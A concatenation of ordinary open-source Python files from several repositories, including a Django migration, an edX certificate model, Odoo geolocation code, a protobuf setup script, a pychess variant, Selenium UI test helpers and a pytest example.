('deleted_on', models.DateTimeField(blank=True, verbose_name='deleted on', editable=False, null=True, help_text='Date of deletion')),
('active', models.BooleanField(editable=False, verbose_name='active', default=True, help_text='Is the data usable ?')),
('label', models.CharField(verbose_name='label', max_length=32, help_text='The way the data will be see from foreign objects')),
('name', models.CharField(unique=True, editable=False, verbose_name='name', max_length=255, help_text='Unique name, used in imports/exports features')),
('created_by', base.fields.UserField(null=True, editable=False, verbose_name='created by', related_name='created_util_mimeregistry_set', to=settings.AUTH_USER_MODEL, help_text='The user who created this data')),
('deleted_by', base.fields.UserField(null=True, editable=False, verbose_name='deleted by', related_name='deleted_util_mimeregistry_set', to=settings.AUTH_USER_MODEL, help_text='The user who deleted this data')),
('last_modified_by', base.fields.UserField(null=True, editable=False, verbose_name='last modified by', related_name='last_modified_util_mimeregistry_set', to=settings.AUTH_USER_MODEL, help_text='The user who last modified this data')),
],
options={
'verbose_name': 'MIME registry',
'verbose_name_plural': 'MIME registries',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='State',
fields=[
('id', models.AutoField(primary_key=True, verbose_name='ID', auto_created=True, serialize=False)),
('created_on', models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now, verbose_name='created on', help_text='Date of creation')),
('last_modified_on', models.DateTimeField(default=django.utils.timezone.now, verbose_name='last modified on', auto_now=True, help_text='Date of last modification')),
('deleted_on', models.DateTimeField(blank=True, verbose_name='deleted on', editable=False, null=True, help_text='Date of deletion')),
('active', models.BooleanField(editable=False, verbose_name='active', default=True, help_text='Is the data usable ?')),
('label', models.CharField(verbose_name='label', max_length=32, help_text='The way the data will be see from foreign objects')),
('name', models.CharField(unique=True, editable=False, verbose_name='name', max_length=255, help_text='Unique name, used in imports/exports features')),
('code', models.CharField(unique=True, verbose_name='code', max_length=5, help_text='Two letters code')),
],
options={
'verbose_name': 'state',
'verbose_name_plural': 'states',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='StateCategory',
fields=[
('id', models.AutoField(primary_key=True, verbose_name='ID', auto_created=True, serialize=False)),
('created_on', models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now, verbose_name='created on', help_text='Date of creation')),
('last_modified_on', models.DateTimeField(default=django.utils.timezone.now, verbose_name='last modified on', auto_now=True, help_text='Date of last modification')),
('deleted_on', models.DateTimeField(blank=True, verbose_name='deleted on', editable=False, null=True, help_text='Date of deletion')),
('active', models.BooleanField(editable=False, verbose_name='active', default=True, help_text='Is the data usable ?')),
('label', models.CharField(verbose_name='label', max_length=32, help_text='The way the data will be see from foreign objects')),
('name', models.CharField(unique=True, editable=False, verbose_name='name', max_length=255, help_text='Unique name, used in imports/exports features')),
('plural', models.CharField(verbose_name='plural', max_length=127, help_text='Plural label')),
('created_by', base.fields.UserField(null=True, editable=False, verbose_name='created by', related_name='created_util_statecategory_set', to=settings.AUTH_USER_MODEL, help_text='The user who created this data')),
('deleted_by', base.fields.UserField(null=True, editable=False, verbose_name='deleted by', related_name='deleted_util_statecategory_set', to=settings.AUTH_USER_MODEL, help_text='The user who deleted this data')),
('last_modified_by', base.fields.UserField(null=True, editable=False, verbose_name='last modified by', related_name='last_modified_util_statecategory_set', to=settings.AUTH_USER_MODEL, help_text='The user who last modified this data')),
],
options={
'verbose_name': 'state category',
'verbose_name_plural': 'state categories',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Status',
fields=[
('id', models.AutoField(primary_key=True, verbose_name='ID', auto_created=True, serialize=False)),
('created_on', models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now, verbose_name='created on', help_text='Date of creation')),
('last_modified_on', models.DateTimeField(default=django.utils.timezone.now, verbose_name='last modified on', auto_now=True, help_text='Date of last modification')),
('deleted_on', models.DateTimeField(blank=True, verbose_name='deleted on', editable=False, null=True, help_text='Date of deletion')),
('active', models.BooleanField(editable=False, verbose_name='active', default=True, help_text='Is the data usable ?')),
('label', models.CharField(verbose_name='label', max_length=32, help_text='The way the data will be see from foreign objects')),
('name', models.CharField(unique=True, editable=False, verbose_name='name', max_length=255, help_text='Unique name, used in imports/exports features')),
('model', models.CharField(verbose_name='model', max_length=32, help_text='Model related to the status')),
('is_default', models.BooleanField(verbose_name='status name', default=False, help_text='Is the status is the default one for the model ?')),
('created_by', base.fields.UserField(null=True, editable=False, verbose_name='created by', related_name='created_util_status_set', to=settings.AUTH_USER_MODEL, help_text='The user who created this data')),
('deleted_by', base.fields.UserField(null=True, editable=False, verbose_name='deleted by', related_name='deleted_util_status_set', to=settings.AUTH_USER_MODEL, help_text='The user who deleted this data')),
('last_modified_by', base.fields.UserField(null=True, editable=False, verbose_name='last modified by', related_name='last_modified_util_status_set', to=settings.AUTH_USER_MODEL, help_text='The user who last modified this data')),
],
options={
'verbose_name': 'status',
'verbose_name_plural': 'statuses',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='TimeZone',
fields=[
('id', models.AutoField(primary_key=True, verbose_name='ID', auto_created=True, serialize=False)),
('created_on', models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now, verbose_name='created on', help_text='Date of creation')),
('last_modified_on', models.DateTimeField(default=django.utils.timezone.now, verbose_name='last modified on', auto_now=True, help_text='Date of last modification')),
('deleted_on', models.DateTimeField(blank=True, verbose_name='deleted on', editable=False, null=True, help_text='Date of deletion')),
('active', models.BooleanField(editable=False, verbose_name='active', default=True, help_text='Is the data usable ?')),
('label', models.CharField(verbose_name='label', max_length=32, help_text='The way the data will be see from foreign objects')),
('name', models.CharField(unique=True, editable=False, verbose_name='name', max_length=255, help_text='Unique name, used in imports/exports features')),
('created_by', base.fields.UserField(null=True, editable=False, verbose_name='created by', related_name='created_util_timezone_set', to=settings.AUTH_USER_MODEL, help_text='The user who created this data')),
('deleted_by', base.fields.UserField(null=True, editable=False, verbose_name='deleted by', related_name='deleted_util_timezone_set', to=settings.AUTH_USER_MODEL, help_text='The user who deleted this data')),
('last_modified_by', base.fields.UserField(null=True, editable=False, verbose_name='last modified by', related_name='last_modified_util_timezone_set', to=settings.AUTH_USER_MODEL, help_text='The user who last modified this data')),
],
options={
'verbose_name': 'timezone',
'verbose_name_plural': 'timezones',
},
bases=(models.Model,),
),
migrations.AddField(
model_name='state',
name='category',
field=models.ForeignKey(verbose_name='category', related_name='registry_state_set', to='util.StateCategory', help_text='State, Province or District'),
preserve_default=True,
),
migrations.AddField(
model_name='state',
name='country',
field=models.ForeignKey(verbose_name='country', related_name='state_set', to='util.Country', help_text='Related country'),
preserve_default=True,
),
migrations.AddField(
model_name='state',
name='created_by',
field=base.fields.UserField(null=True, editable=False, verbose_name='created by', related_name='created_util_state_set', to=settings.AUTH_USER_MODEL, help_text='The user who created this data'),
preserve_default=True,
),
migrations.AddField(
model_name='state',
name='deleted_by',
field=base.fields.UserField(null=True, editable=False, verbose_name='deleted by', related_name='deleted_util_state_set', to=settings.AUTH_USER_MODEL, help_text='The user who deleted this data'),
preserve_default=True,
),
migrations.AddField(
model_name='state',
name='last_modified_by',
field=base.fields.UserField(null=True, editable=False, verbose_name='last modified by', related_name='last_modified_util_state_set', to=settings.AUTH_USER_MODEL, help_text='The user who last modified this data'),
preserve_default=True,
),
migrations.AddField(
model_name='mime',
name='registry',
field=models.ForeignKey(verbose_name='registry', related_name='registry_mime_set', to='util.MimeRegistry', help_text='Mime type registry'),
preserve_default=True,
),
]
|
XiaodunServerGroup/xiaodun-platform
|
refs/heads/master
|
lms/djangoapps/certificates/models.py
|
22
|
from django.contrib.auth.models import User
from django.db import models
from datetime import datetime
from model_utils import Choices
"""
Certificates are created for a student and an offering of a course.
When a certificate is generated, a unique ID is generated so that
the certificate can be verified later. The ID is a UUID4, so that
it can't be easily guessed and so that it is unique.
Certificates are generated in batches by a cron job, when a
certificate is available for download the GeneratedCertificate
table is updated with information that will be displayed
on the course overview page.
State diagram:
[deleted,error,unavailable] [error,downloadable]
+ + +
| | |
| | |
add_cert regen_cert del_cert
| | |
v v v
[generating] [regenerating] [deleting]
+ + +
| | |
certificate certificate certificate
created removed,created deleted
+----------------+-------------+------->[error]
| | |
| | |
v v v
[downloadable] [downloadable] [deleted]
Eligibility:
Students are eligible for a certificate if they pass the course
with the following exceptions:
If the student has allow_certificate set to False in the student profile
he will never be issued a certificate.
If the user and course is present in the certificate whitelist table
then the student will be issued a certificate regardless of his grade,
unless he has allow_certificate set to False.
"""
class CertificateStatuses(object):
deleted = 'deleted'
deleting = 'deleting'
downloadable = 'downloadable'
error = 'error'
generating = 'generating'
notpassing = 'notpassing'
regenerating = 'regenerating'
restricted = 'restricted'
unavailable = 'unavailable'
class CertificateWhitelist(models.Model):
"""
Tracks students who are whitelisted, all users
in this table will always qualify for a certificate
regardless of their grade unless they are on the
embargoed country restriction list
(allow_certificate set to False in userprofile).
"""
user = models.ForeignKey(User)
course_id = models.CharField(max_length=255, blank=True, default='')
whitelist = models.BooleanField(default=0)
class GeneratedCertificate(models.Model):
user = models.ForeignKey(User)
course_id = models.CharField(max_length=255, blank=True, default='')
verify_uuid = models.CharField(max_length=32, blank=True, default='')
download_uuid = models.CharField(max_length=32, blank=True, default='')
download_url = models.CharField(max_length=128, blank=True, default='')
grade = models.CharField(max_length=5, blank=True, default='')
key = models.CharField(max_length=32, blank=True, default='')
distinction = models.BooleanField(default=False)
status = models.CharField(max_length=32, default='unavailable')
MODES = Choices('verified', 'honor', 'audit')
mode = models.CharField(max_length=32, choices=MODES, default=MODES.honor)
name = models.CharField(blank=True, max_length=255)
created_date = models.DateTimeField(
auto_now_add=True, default=datetime.now)
modified_date = models.DateTimeField(
auto_now=True, default=datetime.now)
error_reason = models.CharField(max_length=512, blank=True, default='')
class Meta:
unique_together = (('user', 'course_id'),)
def certificate_status_for_student(student, course_id):
'''
This returns a dictionary with a key for status, and other information.
The status is one of the following:
unavailable - No entry for this student--if they are actually in
the course, they probably have not been graded for
certificate generation yet.
generating - A request has been made to generate a certificate,
but it has not been generated yet.
regenerating - A request has been made to regenerate a certificate,
but it has not been generated yet.
deleting - A request has been made to delete a certificate.
deleted - The certificate has been deleted.
downloadable - The certificate is available for download.
notpassing - The student was graded but is not passing
restricted - The student is on the restricted embargo list and
should not be issued a certificate. This will
be set if allow_certificate is set to False in
the userprofile table
If the status is "downloadable", the dictionary also contains
"download_url".
If the student has been graded, the dictionary also contains their
grade for the course with the key "grade".
'''
try:
generated_certificate = GeneratedCertificate.objects.get(
user=student, course_id=course_id)
d = {'status': generated_certificate.status,
'mode': generated_certificate.mode}
if generated_certificate.grade:
d['grade'] = generated_certificate.grade
if generated_certificate.status == CertificateStatuses.downloadable:
d['download_url'] = generated_certificate.download_url
return d
except GeneratedCertificate.DoesNotExist:
pass
return {'status': CertificateStatuses.unavailable, 'mode': GeneratedCertificate.MODES.honor}
|
joariasl/odoo
|
refs/heads/8.0
|
addons/base_geolocalize/models/res_partner.py
|
239
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2013_Today OpenERP SA (<http://www.openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
try:
import simplejson as json
except ImportError:
import json # noqa
import urllib
from openerp.osv import osv, fields
from openerp import tools
from openerp.tools.translate import _
def geo_find(addr):
url = 'https://maps.googleapis.com/maps/api/geocode/json?sensor=false&address='
url += urllib.quote(addr.encode('utf8'))
try:
result = json.load(urllib.urlopen(url))
except Exception, e:
raise osv.except_osv(_('Network error'),
_('Cannot contact geolocation servers. Please make sure that your internet connection is up and running (%s).') % e)
if result['status'] != 'OK':
return None
try:
geo = result['results'][0]['geometry']['location']
return float(geo['lat']), float(geo['lng'])
except (KeyError, ValueError):
return None
def geo_query_address(street=None, zip=None, city=None, state=None, country=None):
if country and ',' in country and (country.endswith(' of') or country.endswith(' of the')):
# put country qualifier in front, otherwise GMap gives wrong results,
# e.g. 'Congo, Democratic Republic of the' => 'Democratic Republic of the Congo'
country = '{1} {0}'.format(*country.split(',', 1))
return tools.ustr(', '.join(filter(None, [street,
("%s %s" % (zip or '', city or '')).strip(),
state,
country])))
class res_partner(osv.osv):
_inherit = "res.partner"
_columns = {
'partner_latitude': fields.float('Geo Latitude', digits=(16, 5)),
'partner_longitude': fields.float('Geo Longitude', digits=(16, 5)),
'date_localization': fields.date('Geo Localization Date'),
}
def geo_localize(self, cr, uid, ids, context=None):
# Don't pass context to browse()! We need country names in english below
for partner in self.browse(cr, uid, ids):
if not partner:
continue
result = geo_find(geo_query_address(street=partner.street,
zip=partner.zip,
city=partner.city,
state=partner.state_id.name,
country=partner.country_id.name))
if result:
self.write(cr, uid, [partner.id], {
'partner_latitude': result[0],
'partner_longitude': result[1],
'date_localization': fields.date.context_today(self, cr, uid, context=context)
}, context=context)
return True
|
atomicobject/kinetic-c
|
refs/heads/master
|
vendor/protobuf-2.5.0/python/setup.py
|
32
|
#! /usr/bin/python
#
# See README for usage instructions.
import sys
import os
import subprocess
# We must use setuptools, not distutils, because we need to use the
# namespace_packages option for the "google" package.
try:
from setuptools import setup, Extension
except ImportError:
try:
from ez_setup import use_setuptools
use_setuptools()
from setuptools import setup, Extension
except ImportError:
sys.stderr.write(
"Could not import setuptools; make sure you have setuptools or "
"ez_setup installed.\n")
raise
from distutils.command.clean import clean as _clean
from distutils.command.build_py import build_py as _build_py
from distutils.spawn import find_executable
maintainer_email = "[email protected]"
# Find the Protocol Compiler.
if 'PROTOC' in os.environ and os.path.exists(os.environ['PROTOC']):
protoc = os.environ['PROTOC']
elif os.path.exists("../src/protoc"):
protoc = "../src/protoc"
elif os.path.exists("../src/protoc.exe"):
protoc = "../src/protoc.exe"
elif os.path.exists("../vsprojects/Debug/protoc.exe"):
protoc = "../vsprojects/Debug/protoc.exe"
elif os.path.exists("../vsprojects/Release/protoc.exe"):
protoc = "../vsprojects/Release/protoc.exe"
else:
protoc = find_executable("protoc")
def generate_proto(source):
"""Invokes the Protocol Compiler to generate a _pb2.py from the given
.proto file. Does nothing if the output already exists and is newer than
the input."""
output = source.replace(".proto", "_pb2.py").replace("../src/", "")
if (not os.path.exists(output) or
(os.path.exists(source) and
os.path.getmtime(source) > os.path.getmtime(output))):
print "Generating %s..." % output
if not os.path.exists(source):
sys.stderr.write("Can't find required file: %s\n" % source)
sys.exit(-1)
if protoc == None:
sys.stderr.write(
"protoc is not installed nor found in ../src. Please compile it "
"or install the binary package.\n")
sys.exit(-1)
protoc_command = [ protoc, "-I../src", "-I.", "--python_out=.", source ]
if subprocess.call(protoc_command) != 0:
sys.exit(-1)
def GenerateUnittestProtos():
generate_proto("../src/google/protobuf/unittest.proto")
generate_proto("../src/google/protobuf/unittest_custom_options.proto")
generate_proto("../src/google/protobuf/unittest_import.proto")
generate_proto("../src/google/protobuf/unittest_import_public.proto")
generate_proto("../src/google/protobuf/unittest_mset.proto")
generate_proto("../src/google/protobuf/unittest_no_generic_services.proto")
generate_proto("google/protobuf/internal/test_bad_identifiers.proto")
generate_proto("google/protobuf/internal/more_extensions.proto")
generate_proto("google/protobuf/internal/more_extensions_dynamic.proto")
generate_proto("google/protobuf/internal/more_messages.proto")
generate_proto("google/protobuf/internal/factory_test1.proto")
generate_proto("google/protobuf/internal/factory_test2.proto")
def MakeTestSuite():
# This is apparently needed on some systems to make sure that the tests
# work even if a previous version is already installed.
if 'google' in sys.modules:
del sys.modules['google']
GenerateUnittestProtos()
import unittest
import google.protobuf.internal.generator_test as generator_test
import google.protobuf.internal.descriptor_test as descriptor_test
import google.protobuf.internal.reflection_test as reflection_test
import google.protobuf.internal.service_reflection_test \
as service_reflection_test
import google.protobuf.internal.text_format_test as text_format_test
import google.protobuf.internal.wire_format_test as wire_format_test
import google.protobuf.internal.unknown_fields_test as unknown_fields_test
import google.protobuf.internal.descriptor_database_test \
as descriptor_database_test
import google.protobuf.internal.descriptor_pool_test as descriptor_pool_test
import google.protobuf.internal.message_factory_test as message_factory_test
import google.protobuf.internal.message_cpp_test as message_cpp_test
import google.protobuf.internal.reflection_cpp_generated_test \
as reflection_cpp_generated_test
loader = unittest.defaultTestLoader
suite = unittest.TestSuite()
for test in [ generator_test,
descriptor_test,
reflection_test,
service_reflection_test,
text_format_test,
wire_format_test ]:
suite.addTest(loader.loadTestsFromModule(test))
return suite
class clean(_clean):
def run(self):
# Delete generated files in the code tree.
for (dirpath, dirnames, filenames) in os.walk("."):
for filename in filenames:
filepath = os.path.join(dirpath, filename)
if filepath.endswith("_pb2.py") or filepath.endswith(".pyc") or \
filepath.endswith(".so") or filepath.endswith(".o") or \
filepath.endswith('google/protobuf/compiler/__init__.py'):
os.remove(filepath)
# _clean is an old-style class, so super() doesn't work.
_clean.run(self)
class build_py(_build_py):
def run(self):
# Generate necessary .proto file if it doesn't exist.
generate_proto("../src/google/protobuf/descriptor.proto")
generate_proto("../src/google/protobuf/compiler/plugin.proto")
GenerateUnittestProtos()
# Make sure google.protobuf.compiler is a valid package.
open('google/protobuf/compiler/__init__.py', 'a').close()
# _build_py is an old-style class, so super() doesn't work.
_build_py.run(self)
if __name__ == '__main__':
ext_module_list = []
# C++ implementation extension
if os.getenv("PROTOCOL_BUFFERS_PYTHON_IMPLEMENTATION", "python") == "cpp":
print "Using EXPERIMENTAL C++ Implmenetation."
ext_module_list.append(Extension(
"google.protobuf.internal._net_proto2___python",
[ "google/protobuf/pyext/python_descriptor.cc",
"google/protobuf/pyext/python_protobuf.cc",
"google/protobuf/pyext/python-proto2.cc" ],
include_dirs = [ "." ],
libraries = [ "protobuf" ]))
setup(name = 'protobuf',
version = '2.5.0',
packages = [ 'google' ],
namespace_packages = [ 'google' ],
test_suite = 'setup.MakeTestSuite',
# Must list modules explicitly so that we don't install tests.
py_modules = [
'google.protobuf.internal.api_implementation',
'google.protobuf.internal.containers',
'google.protobuf.internal.cpp_message',
'google.protobuf.internal.decoder',
'google.protobuf.internal.encoder',
'google.protobuf.internal.enum_type_wrapper',
'google.protobuf.internal.message_listener',
'google.protobuf.internal.python_message',
'google.protobuf.internal.type_checkers',
'google.protobuf.internal.wire_format',
'google.protobuf.descriptor',
'google.protobuf.descriptor_pb2',
'google.protobuf.compiler.plugin_pb2',
'google.protobuf.message',
'google.protobuf.descriptor_database',
'google.protobuf.descriptor_pool',
'google.protobuf.message_factory',
'google.protobuf.reflection',
'google.protobuf.service',
'google.protobuf.service_reflection',
'google.protobuf.text_format' ],
cmdclass = { 'clean': clean, 'build_py': build_py },
install_requires = ['setuptools'],
ext_modules = ext_module_list,
url = 'http://code.google.com/p/protobuf/',
maintainer = maintainer_email,
maintainer_email = '[email protected]',
license = 'New BSD License',
description = 'Protocol Buffers',
long_description =
"Protocol Buffers are Google's data interchange format.",
)
|
Tyler2004/pychess
|
refs/heads/master
|
lib/pychess/Variants/corner.py
|
20
|
from __future__ import print_function
# Corner Chess
import random
from pychess.Utils.const import *
from pychess.Utils.Board import Board
class CornerBoard(Board):
variant = CORNERCHESS
def __init__ (self, setup=False, lboard=None):
if setup is True:
Board.__init__(self, setup=self.shuffle_start(), lboard=lboard)
else:
Board.__init__(self, setup=setup, lboard=lboard)
def shuffle_start(self):
b1 = b2 = 0
tmp = ['r', 'n', 'b', 'q', 'b', 'n', 'r']
while (b1%2 == b2%2):
random.shuffle(tmp)
b1 = tmp.index('b')
b2 = tmp.index('b', b1+1)
tmp = ''.join(tmp)
tmp = 'k' + tmp + '/pppppppp/8/8/8/8/PPPPPPPP/' + tmp[::-1].upper() + 'K w - - 0 1'
return tmp
class CornerChess:
__desc__ = \
_("http://brainking.com/en/GameRules?tp=2\n" +
"* Placement of the pieces on the 1st and 8th row are randomized\n" +
"* The king is in the right hand corner\n" +
"* Bishops must start on opposite color squares\n" +
"* Black's starting position is obtained by rotating white's position 180 degrees around the board's center\n" +
"* No castling")
name = _("Corner")
cecp_name = "nocastle"
board = CornerBoard
need_initial_board = True
standard_rules = True
variant_group = VARIANTS_SHUFFLE
if __name__ == '__main__':
Board = CornerBoard(True)
for i in range(10):
print(Board.shuffle_start())
|
johnsonc/OTM2
|
refs/heads/master
|
opentreemap/treemap/tests/ui/__init__.py
|
3
|
# -*- coding: utf-8 -*-
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import division
import importlib
from time import sleep
from django.test import LiveServerTestCase
from django.conf import settings
from django.contrib.contenttypes.models import ContentType
from registration.models import RegistrationProfile
from selenium.common.exceptions import (WebDriverException,
StaleElementReferenceException)
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.firefox.webdriver import WebDriver
from selenium.webdriver.support.wait import WebDriverWait
from treemap.tests import make_commander_user, create_mock_system_user
from treemap.models import Instance, Tree, Plot
from treemap.lib.object_caches import clear_caches
from treemap.plugin import setup_for_ui_test
def patch_broken_pipe_error():
"""
Monkey Patch BaseServer.handle_error to not write
a stacktrace to stderr on broken pipe.
http://stackoverflow.com/a/21788372/362702
"""
import sys
from SocketServer import BaseServer
from wsgiref import handlers
handle_error = BaseServer.handle_error
log_exception = handlers.BaseHandler.log_exception
def is_broken_pipe_error():
type, err, tb = sys.exc_info()
return repr(err) == "error(32, 'Broken pipe')"
def my_handle_error(self, request, client_address):
if not is_broken_pipe_error():
handle_error(self, request, client_address)
def my_log_exception(self, exc_info):
if not is_broken_pipe_error():
log_exception(self, exc_info)
BaseServer.handle_error = my_handle_error
handlers.BaseHandler.log_exception = my_log_exception
# In many tests we close the browser when there are still pending requests,
# such as for map tiles. When running on a dev machine that leads to messy
# output about "broken pipe" errors. Muzzle it.
patch_broken_pipe_error()
class UITestCase(LiveServerTestCase):
def use_xvfb(self):
from pyvirtualdisplay import Display
self.display = Display('xvfb',
visible=1,
size=(1280, 1024))
self.display.start()
self.driver = WebDriver()
def setUp(self):
try:
self.driver = WebDriver()
ui_is_not_available = False
except WebDriverException:
ui_is_not_available = True
if ui_is_not_available:
self.use_xvfb()
self.driver.implicitly_wait(10)
clear_caches()
setup_for_ui_test()
super(UITestCase, self).setUp()
def tearDown(self):
self.driver.quit()
if hasattr(self, 'display'):
self.display.stop()
ContentType.objects.clear_cache()
super(UITestCase, self).tearDown()
def click(self, selector):
self.find(selector).click()
def click_when_visible(self, selector):
element = self.find(selector)
self.wait_until_visible(element)
element.click()
def find(self, selector):
return self.driver.find_element_by_css_selector(selector)
def find_name(self, name):
return self.driver.find_element_by_name(name)
def find_id(self, id):
return self.driver.find_element_by_id(id)
def process_login_form(self, username, password):
username_elmt = self.wait_until_present('[name="username"]')
password_elmt = self.find_name('password')
username_elmt.send_keys(username)
password_elmt.send_keys(password)
self.click('form * button')
def browse_to_url(self, url):
self.driver.get(self.live_server_url + url)
def browse_to_instance_url(self, url, instance=None):
instance = instance if instance is not None else self.instance
self.driver.get('%s/%s/%s' % (self.live_server_url,
self.instance.url_name,
url))
def find_anchor_by_url(self, url):
return self.find("[href='%s']" % url)
def wait_until_present(self, selector, timeout=10):
"""
Wait until an element with CSS 'selector' exists on the page.
Useful for detecting that an operation loads the page you're expecting.
"""
element = [None] # use list so it can be set by inner scope
def is_present(driver):
element[0] = self.find(selector)
return element[0] is not None
WebDriverWait(self.driver, timeout).until(is_present)
return element[0]
def wait_until_text_present(self, text, timeout=10):
"""
Wait until 'text' exists on the page.
Useful for detecting that an operation loads the page you're expecting.
"""
WebDriverWait(self.driver, timeout).until(
lambda driver: text in driver.page_source)
def wait_until_enabled(self, element_or_selector, timeout=10):
"""
Wait until 'element_or_selector' is enabled.
"""
element = self._get_element(element_or_selector)
WebDriverWait(self.driver, timeout).until(
lambda driver: element.get_attribute("disabled") is None)
return element
def wait_until_visible(self, element_or_selector, timeout=10):
"""
Wait until 'element_or_selector' (known to already exist on the page)
is displayed.
"""
element = self._get_element(element_or_selector)
WebDriverWait(self.driver, timeout).until(
lambda driver: element.is_displayed())
return element
def wait_until_invisible(self, element_or_selector, timeout=10):
"""
Wait until 'element_or_selector' (known to already exist on the page)
is not displayed.
"""
element = self._get_element(element_or_selector)
def is_invisible(driver):
try:
return not element.is_displayed()
except StaleElementReferenceException:
return True
WebDriverWait(self.driver, timeout).until(is_invisible)
return element
def _get_element(self, element_or_selector):
if isinstance(element_or_selector, basestring):
return self.find(element_or_selector)
else:
return element_or_selector
class TreemapUITestCase(UITestCase):
def assertElementVisibility(self, element, visible):
if isinstance(element, basestring):
element = self.find_id(element)
wait = (self.wait_until_visible if visible
else self.wait_until_invisible)
wait(element)
self.assertEqual(visible, element.is_displayed())
def setUp(self):
# for some reason, the call to this helper
# in setup_databases() on the test runner
# is not executing in this context.
# this is required to make the test work.
create_mock_system_user()
super(TreemapUITestCase, self).setUp()
instance_name = 'autotest_instance'
Instance.objects.filter(name=instance_name).delete()
self.instance = create_instance(
name=instance_name,
is_public=False,
url_name='autotest-instance',
edge_length=20000)
self.user = make_commander_user(instance=self.instance,
username='username')
self.profile = RegistrationProfile.objects.create_profile(self.user)
def login_workflow(self, user=None):
if user is None:
user = self.user
self.browse_to_url('/accounts/logout/')
self.browse_to_url('/accounts/login/')
self.process_login_form(user.username, 'password')
def url_is_user_page(driver):
return driver.current_url.endswith('/users/%s/' % user.username)
WebDriverWait(self.driver, 10).until(url_is_user_page)
def drag_marker_on_map(self, endx, endy):
actions = ActionChains(self.driver)
marker = self.find('.leaflet-marker-pane img')
actions.drag_and_drop_by_offset(marker, endx, endy)
actions.perform()
self._click_add_tree_next_step(0)
def click_point_on_map(self, x, y):
# We're in add tree mode, now we need to click somewhere on the map
map_div = self.find_id('map')
actions = ActionChains(self.driver)
# move to the center of the map
actions.move_to_element(map_div)
# move away from the center
actions.move_by_offset(x, y)
actions.click()
actions.perform()
def click_add_tree(self):
# Enter add tree mode
self.click(".subhead .addBtn")
def _click_add_tree_next_step(self, n):
button = self.driver.find_elements_by_css_selector(
'#sidebar-add-tree .add-step-footer li.next a')[n]
self.wait_until_enabled(button)
button.click()
sleep(1) # wait for animation to show the next step
def start_add_tree(self, x, y):
self.click_add_tree()
self.click_point_on_map(x, y)
self._click_add_tree_next_step(0)
def instance_trees(self):
return Tree.objects.filter(instance=self.instance)
def ntrees(self):
return self.instance_trees().count()
def instance_plots(self):
return Plot.objects.filter(instance=self.instance)
def nplots(self):
return self.instance_plots().count()
def go_to_map_page(self):
self.browse_to_instance_url("map/")
def go_to_feature_detail(self, feature_id, edit=False):
self.browse_to_instance_url("features/%s/%s"
% (feature_id,
"edit" if edit else ""))
def go_to_tree_detail(self, plot_id, tree_id):
self.browse_to_instance_url("features/%s/trees/%s/"
% (plot_id, tree_id))
def add_tree_done(self, whenDone='close'):
# Move to "Finalize" step
self._click_add_tree_next_step(1)
if whenDone == 'copy':
self.click('#addtree-addsame')
elif whenDone == 'new':
self.click('#addtree-addnew')
elif whenDone == 'edit':
self.click('#addtree-viewdetails')
elif whenDone == 'close':
self.click('#addtree-done')
# Click "Done"
self._click_add_tree_next_step(2)
if whenDone == 'close':
# Wait for "browse trees" mode
self.wait_until_visible('#sidebar-browse-trees')
elif whenDone == 'edit':
# Wait for "save" button on "plot detail" page
self.wait_until_visible('#save-edit-plot', 30)
else:
# Wait for "Add Tree" step 1
self.wait_until_visible('#sidebar-add-tree .form-search')
def login_and_go_to_map_page(self):
self.login_workflow()
self.go_to_map_page()
def parse_function_string(module_and_function_string):
"""
Given a string like:
a.b.c.f
Return the function 'f' from module 'a.b.c'
"""
parts = module_and_function_string.split('.')
mod = '.'.join(parts[0:-1])
fn = parts[-1]
return getattr(importlib.import_module(mod), fn)
def _get_create_instance():
return parse_function_string(
settings.UITEST_CREATE_INSTANCE_FUNCTION)
create_instance = _get_create_instance()
|
jeenalee/servo
|
refs/heads/master
|
tests/wpt/web-platform-tests/tools/pytest/doc/en/example/assertion/test_setup_flow_example.py
|
217
|
def setup_module(module):
module.TestStateFullThing.classcount = 0
class TestStateFullThing:
def setup_class(cls):
cls.classcount += 1
def teardown_class(cls):
cls.classcount -= 1
def setup_method(self, method):
self.id = eval(method.__name__[5:])
def test_42(self):
assert self.classcount == 1
assert self.id == 42
def test_23(self):
assert self.classcount == 1
assert self.id == 23
def teardown_module(module):
assert module.TestStateFullThing.classcount == 0
""" For this example the control flow happens as follows::
import test_setup_flow_example
setup_module(test_setup_flow_example)
setup_class(TestStateFullThing)
instance = TestStateFullThing()
setup_method(instance, instance.test_42)
instance.test_42()
setup_method(instance, instance.test_23)
instance.test_23()
teardown_class(TestStateFullThing)
teardown_module(test_setup_flow_example)
Note that ``setup_class(TestStateFullThing)`` is called and not
``TestStateFullThing.setup_class()`` which would require you
to insert ``setup_class = classmethod(setup_class)`` to make
your setup function callable.
"""
|
SpectreJan/gnuradio
|
refs/heads/master
|
gr-wxgui/python/wxgui/scopesink_gl.py
|
58
|
#
# Copyright 2008,2010,2012 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
##################################################
# Imports
##################################################
import scope_window
import common
from gnuradio import gr, filter
